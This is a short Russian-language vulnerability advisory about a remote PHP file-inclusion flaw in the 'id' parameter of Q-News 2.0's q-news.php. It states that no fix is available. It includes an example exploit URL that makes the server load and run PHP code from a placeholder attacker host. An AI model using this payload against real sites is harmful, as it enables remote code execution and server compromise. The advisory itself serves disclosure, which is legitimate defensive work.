Security Lab

PHP инклюдинг в Q-News

Дата публикации:29.11.2005
Всего просмотров:2477
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Q-News 2.x
Уязвимые версии: Q-News 2.0, возможно белее ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Уязвимость обнаружена при обработке входных данных в параметре "id" сценария "q-news.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]

URL производителя: sourceforge.net/projects/q-news/

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Remote file include in Q-News